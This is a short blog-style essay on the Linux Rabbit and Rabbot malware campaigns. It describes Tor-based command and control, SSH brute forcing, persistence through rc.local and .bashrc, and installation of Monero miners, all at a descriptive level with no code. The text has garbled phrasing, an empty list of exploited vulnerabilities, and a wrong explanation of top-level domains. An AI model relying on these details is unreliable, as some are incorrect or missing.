Rabbit's running Rabbot

Toby Arnett
January 19, 2019

             The future of technology with IoT devices and many business systems have come to rely on various Linux systems. This is an open source operating system that can be utilized in many ways to create a robust system for high-end servers or a low resource intensive operating system for devices like thermostats, garage door openers, smart lights, and many other IoT devices. The release of Raspberry Pi’s and various other systems have also utilized Linux variants for their primary operating system.

 

             While Linux operating systems are infrequently attacked by virus or malware like the Windows operating system they still have their vulnerabilities. According to AV-Test in 2016 out of 76,000 samples, only 412 were Linux related malware attempts. This, however, does not mean they are free from attack. As more devices become network compliant the more vulnerabilities present themselves for attackers.

 

 

             This was the case for a recent malware attack that targeted Linux servers in Russia, US,

UK, and South Korea as a first strike campaign. There was then a second campaign that was a

global attack.  This was identified by Anomali Labs in August of 2018. The campaign targeted

Linux and Internet of Things (IoT) devices using two different strains of malware that utilized

the same code base called Linux Rabbit and “Rabbot”. The campaign was created to install

cryptocurrency miners on the targeted devices. This malware utilized several factors in this attack.

 

  • The ability to establish a connection with the C2 using Tor gateways.

  • The ability to gain persistence over the targeted device.

  • The ability to perform an SSH brute force attack to gain access to the server.

  • The ability to install the appropriate version of the cryptocurrency miner on the server.

 

             The malware affected the utilized the “rc.local” files and “.bashrc” files to create a persistent connection to its command and control (C&C) server. These files are utilized by the operating system for various functions that include starting and stopping system services and other operations. The script found in the /etc/local file is typically utilized by system administrators to specify site-specific systems that can be run in the /etc/init.d file for various start/stop scripts. If successful, the threat then attempted to install its payloads: the CNRig and CoinHive Monero miners.rc.

 

             Once the session was established, the connection to the C&C server would use a geo-locate on the source IP address to identify if the target host was on the permitted list or on the “blacklist”. The approved countries on the first campaign were Russia, South Korea, the UK, and the US. The malware would even identify the machine’s hostname and then search backward to the DNS’s Top-Level Domain servers (TLD). If those servers are in blacklisted countries then the script would also stop. A TLD (top-level domain) is the highest level of domain names in the root zone of the DNS of the Internet. This would be the last part of an Internet domain prior to the .com, .edu, or another ending. A TLD would be something like test.com and the sub-domain would be sat.test.com.

             The “Rabbot” strain was used to target many different IoT devices to try and exploit various known vulnerabilities that would come from improperly used programs and other services or improperly patched devices. This was enacted in the second stage of the campaign which was a global event with no blacklisted countries. There are several key differences between Linux Rabbit and Rabbot:

 

  • Rabbot is capable of targeting IoT devices as well as Linux servers.

  • Rabbot was designed to install CoinHive miners into the web pages on an infected web server, by injecting malicious JavsScript code into the server.

  • Rabbot is not geographically restricted, unlike Linux Rabbit which was designed to only operate in specific countries.

 

The known vulnerabilities that Rabbot is capable of exploiting include the following:

 

 

             The malware’s ultimate design was to set up millions of cyber-currency crypto miners worldwide. This was a wide-ranging attack that hit millions of devices, with a wide-ranging variety of device type. This shows that the threat of attacks will continue to increase as more devices become network connected. This requires a thorough look at the security of networks and systems to ensure that a weak link is not an overlooked smart device to help control lighting or the thermostat.